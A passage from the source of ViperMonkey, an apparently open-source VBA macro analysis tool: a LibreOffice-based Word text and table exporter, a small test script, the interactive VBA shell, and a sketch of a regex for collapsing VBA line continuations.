Takes a bit to spin up even after the OS 47 | reports the process as running. Tries 3 times before giving up and 48 | throwing an Exception. 49 | 50 | """ 51 | 52 | tries = 0 53 | 54 | while tries < 3: 55 | try: 56 | connect(Socket(HOST, PORT)) 57 | return 58 | except ConnectionError: 59 | time.sleep(5) 60 | tries += 1 61 | 62 | raise Exception("libreoffice UNO API failed to start") 63 | 64 | ################################################################################################### 65 | def get_office_proc(): 66 | """ 67 | Returns the process info for the headless LibreOffice process, or None if it is not running. 68 | 69 | @return (dict) Process info (keys 'pid', 'name' and 'username'), or None if not found. 70 | """ 71 | 72 | for proc in psutil.process_iter(): 73 | try: 74 | pinfo = proc.as_dict(attrs=['pid', 'name', 'username']) 75 | except psutil.NoSuchProcess: 76 | pass 77 | else: 78 | if (pinfo["name"].startswith("soffice")): 79 | return pinfo 80 | return None 81 | 82 | ################################################################################################### 83 | def is_office_running(): 84 | """Check to see if the headless LibreOffice process is running. 85 | 86 | @return (bool) True if running, False otherwise 87 | 88 | """ 89 | 90 | return True if get_office_proc() else False 91 | 92 | ################################################################################################### 93 | def run_soffice(): 94 | """Start the headless, UNO supporting, LibreOffice process to access 95 | the API, if it is not already running. 96 | 97 | """ 98 | 99 | # start the process 100 | if not is_office_running(): 101 | 102 | # soffice is not running. Run it in listening mode.
103 | cmd = "/usr/lib/libreoffice/program/soffice.bin --headless --invisible " + \ 104 | "--nocrashreport --nodefault --nofirststartwizard --nologo " + \ 105 | "--norestore " + \ 106 | '--accept="socket,host=127.0.0.1,port=2002,tcpNoDelay=1;urp;StarOffice.ComponentContext"' 107 | subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, shell=True) 108 | wait_for_uno_api() 109 | 110 | ################################################################################################### 111 | def get_document(fname, connection): 112 | """Load the component containing the Word document. 113 | 114 | @param fname (str) Path to the Word doc 115 | 116 | @param connection (ScriptContext) Connection to the headless LibreOffice process 117 | 118 | @return (Writer) UNO object representing the loaded Word 119 | document. 120 | 121 | """ 122 | 123 | url = convert_path_to_url(fname) 124 | document = Writer(connection, url) 125 | return document 126 | 127 | ################################################################################################### 128 | def get_text(document): 129 | """Get the document text of a given Word file. 130 | 131 | @param document (Writer) LibreOffice component containing the 132 | document. 133 | 134 | @return (str) The text from the document. 135 | 136 | """ 137 | 138 | # Get the text. Prepend a form feed character (\x0c) to simulate an embedded image at the start. 139 | return "\x0c" + str(document.getText().getString()) 140 | 141 | ################################################################################################### 142 | def get_tables(document): 143 | """Get the text tables embedded in the Word doc. 144 | 145 | @param document (Writer) LibreOffice component containing the 146 | document.
147 | 148 | @return (list) List of 2D arrays containing text content of all 149 | cells in all text tables of the document 150 | 151 | """ 152 | 153 | data_array_list = [] 154 | 155 | text_tables = document.getTextTables() 156 | table_count = 0 157 | while table_count < text_tables.getCount(): 158 | data_array_list.append(text_tables.getByIndex(table_count).getDataArray()) 159 | table_count += 1 160 | 161 | return data_array_list 162 | 163 | 164 | ########################################################################### 165 | ## Main Program 166 | ########################################################################### 167 | if __name__ == '__main__': 168 | arg_parser = argparse.ArgumentParser(description="export text from various properties in a Word " 169 | "document via the LibreOffice API") 170 | arg_parser.add_argument("--tables", action="store_true", 171 | help="export a list of 2D lists containing the cell contents " 172 | "of each text table in the document") 173 | arg_parser.add_argument("--text", action="store_true", 174 | help="export a string containing the document text") 175 | arg_parser.add_argument("-f", "--file", action="store", required=True, 176 | help="path to the Word document") 177 | args = arg_parser.parse_args() 178 | 179 | # Make sure this is a Word file. 180 | if (not is_word_file(args.file)): 181 | 182 | # Not Word, so no text. 183 | exit() 184 | 185 | # Run soffice in listening mode if it is not already running. 186 | run_soffice() 187 | 188 | # Connect to the local LibreOffice server.
189 | connection = connect(Socket(HOST, PORT)) 190 | 191 | # Load the document using the connection 192 | document = get_document(args.file, connection) 193 | 194 | if args.text: 195 | print(get_text(document)) 196 | elif args.tables: 197 | print(json.dumps(get_tables(document))) 198 | 199 | # clean up 200 | document.close(True) 201 | os.kill(get_office_proc()["pid"], signal.SIGTERM) 202 | -------------------------------------------------------------------------------- /vipermonkey/v_test.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | if __name__ == '__main__': 4 | import sys 5 | from vmonkey import * 6 | 7 | f=open(sys.argv[1],'r') 8 | x=f.read() 9 | f.close() 10 | 11 | r=process_file('','',x, strip_useless=True) 12 | 13 | print r[0][1] 14 | -------------------------------------------------------------------------------- /vipermonkey/vbashell.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | """ 3 | ViperMonkey: VBA command line shell 4 | 5 | ViperMonkey is a specialized engine to parse, analyze and interpret Microsoft 6 | VBA macros (Visual Basic for Applications), mainly for malware analysis. 7 | 8 | Author: Philippe Lagadec - http://www.decalage.info 9 | License: BSD, see source code or documentation 10 | 11 | Project Repository: 12 | https://github.com/decalage2/ViperMonkey 13 | """ 14 | 15 | # === LICENSE ================================================================== 16 | 17 | # ViperMonkey is copyright (c) 2015-2016 Philippe Lagadec (http://www.decalage.info) 18 | # All rights reserved. 19 | # 20 | # Redistribution and use in source and binary forms, with or without modification, 21 | # are permitted provided that the following conditions are met: 22 | # 23 | # * Redistributions of source code must retain the above copyright notice, this 24 | # list of conditions and the following disclaimer. 
25 | # * Redistributions in binary form must reproduce the above copyright notice, 26 | # this list of conditions and the following disclaimer in the documentation 27 | # and/or other materials provided with the distribution. 28 | # 29 | # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND 30 | # ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED 31 | # WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 32 | # DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 33 | # FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 34 | # DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 35 | # SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 36 | # CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 37 | # OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 38 | # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 
39 | 40 | from __future__ import print_function 41 | 42 | # ------------------------------------------------------------------------------ 43 | # CHANGELOG: 44 | # 2015-02-12 v0.01 PL: - first prototype 45 | # 2015-2016 PL: - many updates 46 | # 2016-06-11 v0.02 PL: - split vipermonkey into several modules 47 | # 2016-12-11 v0.04 PL: - fixed relative import for vmonkey package (issue #17) 48 | 49 | __version__ = '0.04' 50 | 51 | # ------------------------------------------------------------------------------ 52 | # TODO: 53 | # + use readline 54 | 55 | # --- IMPORTS ------------------------------------------------------------------ 56 | 57 | import logging, optparse, sys, os 58 | 59 | import colorlog 60 | 61 | # add the vipermonkey folder to sys.path (absolute+normalized path): 62 | _thismodule_dir = os.path.normpath(os.path.abspath(os.path.dirname(__file__))) 63 | if not _thismodule_dir in sys.path: 64 | sys.path.insert(0, _thismodule_dir) 65 | 66 | # relative import of the vmonkey module: 67 | import vmonkey 68 | 69 | vm = vmonkey.ViperMonkey() 70 | 71 | 72 | def parse(filename=None): 73 | if filename is None: 74 | print('Enter VBA code, end by a line containing only ".":') 75 | code = '' 76 | line = None 77 | while True: 78 | line = raw_input() 79 | if line == '.': 80 | break 81 | code += line + '\n' 82 | else: 83 | print('Parsing file %r' % filename) 84 | code = open(filename).read() 85 | vm.add_module(code) 86 | 87 | def eval_expression(e): 88 | print('Evaluating %s' % e) 89 | value = vm.eval(e) 90 | print('Returned value: %s' % value) 91 | # print table of all recorded actions 92 | print('Recorded Actions:') 93 | print(vm.dump_actions()) 94 | 95 | 96 | def main(): 97 | """ 98 | Main function, called when vbashell is run from the command line 99 | """ 100 | # print banner with version 101 | print ('vbashell %s - https://github.com/decalage2/ViperMonkey' % __version__) 102 | print ('THIS IS WORK IN PROGRESS - Check updates regularly!') 103 | print ('Please 
report any issue at https://github.com/decalage2/ViperMonkey/issues') 104 | print ('') 105 | 106 | DEFAULT_LOG_LEVEL = "info" # Default log level 107 | LOG_LEVELS = { 108 | 'debug': logging.DEBUG, 109 | 'info': logging.INFO, 110 | 'warning': logging.WARNING, 111 | 'error': logging.ERROR, 112 | 'critical': logging.CRITICAL 113 | } 114 | 115 | usage = 'usage: %prog [options] [filename2 ...]' 116 | parser = optparse.OptionParser(usage=usage) 117 | parser.add_option('-p', '--parse', dest='parse_file', 118 | help='VBA text file to be parsed') 119 | parser.add_option('-e', '--eval', dest='eval_expr', 120 | help='VBA expression to be evaluated') 121 | parser.add_option('-l', '--loglevel', dest="loglevel", action="store", default=DEFAULT_LOG_LEVEL, 122 | help="logging level debug/info/warning/error/critical (default=%default)") 123 | 124 | (options, args) = parser.parse_args() 125 | 126 | # Print help if no arguments are passed 127 | # if len(args) == 0: 128 | # print(__doc__) 129 | # parser.print_help() 130 | # sys.exit() 131 | 132 | # setup logging to the console 133 | # logging.basicConfig(level=LOG_LEVELS[options.loglevel], format='%(levelname)-8s %(message)s') 134 | 135 | colorlog.basicConfig(level=LOG_LEVELS[options.loglevel], format='%(log_color)s%(levelname)-8s %(message)s') 136 | 137 | if options.parse_file: 138 | parse(options.parse_file) 139 | 140 | if options.eval_expr: 141 | eval_expression(options.eval_expr) 142 | 143 | while True: 144 | try: 145 | print("VBA> ", end='') 146 | cmd = raw_input() 147 | 148 | if cmd.startswith('exit'): 149 | break 150 | 151 | if cmd.startswith('parse'): 152 | parse() 153 | 154 | if cmd.startswith('trace'): 155 | args = cmd.split() 156 | print('Tracing %s' % args[1]) 157 | vm.trace(entrypoint=args[1]) 158 | # print table of all recorded actions 159 | print('Recorded Actions:') 160 | print(vm.dump_actions()) 161 | 162 | if cmd.startswith('eval'): 163 | expr = cmd[5:] 164 | eval_expression(expr) 165 | except Exception: 166 | 
vmonkey.log.exception('ERROR') 167 | 168 | if __name__ == '__main__': 169 | main() 170 | 171 | # Soundtrack: This code was developed while listening to "Five Little Monkeys Jumping On The Bed" --------------------------------------------------------------------------------
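The TODO in `vba_collapse_long_lines()` (vipermonkey/core/vba_lines.py) asks whether a regex could replace the three `str.replace` calls so that whitespace after the underscore is also accepted. The following is a minimal sketch of that idea under stated assumptions, not ViperMonkey code: `collapse_long_lines_regex` and `_LINE_CONTINUATION` are hypothetical names, the whitespace set is assumed to be the one passed to `ParserElement.setDefaultWhitespaceChars` (space, tab, `\x19`), and, following the NOTE in that file, at least one whitespace character is required before the underscore.

```python
import re

# Hypothetical helper, not part of ViperMonkey: a regex-based take on the TODO in
# vba_collapse_long_lines(). Assumption: whitespace is space, tab or \x19 (the chars
# passed to setDefaultWhitespaceChars in vba_lines.py). At least one whitespace char
# is required before the underscore (per the NOTE in that file); whitespace after it
# is optional. The line terminator may be CRLF, CR or LF (CRLF is tried first).
_LINE_CONTINUATION = re.compile(r'[ \t\x19]+_[ \t\x19]*(?:\r\n|\r|\n)')


def collapse_long_lines_regex(vba_code):
    """Collapse VBA line continuations, replacing each one with a single space."""
    # None or empty input: nothing to collapse.
    if not vba_code:
        return ""
    # Like the original function, make sure the last line ends with a newline.
    if not vba_code.endswith('\n'):
        vba_code += '\n'
    return _LINE_CONTINUATION.sub(' ', vba_code)
```

For example, `collapse_long_lines_regex('x = 1 + _  \n2')` returns `'x = 1 + 2\n'`, whereas the current `str.replace` calls leave that continuation in place because of the spaces after the underscore. Requiring whitespace before the underscore keeps a line that merely ends in an identifier such as `a_` intact.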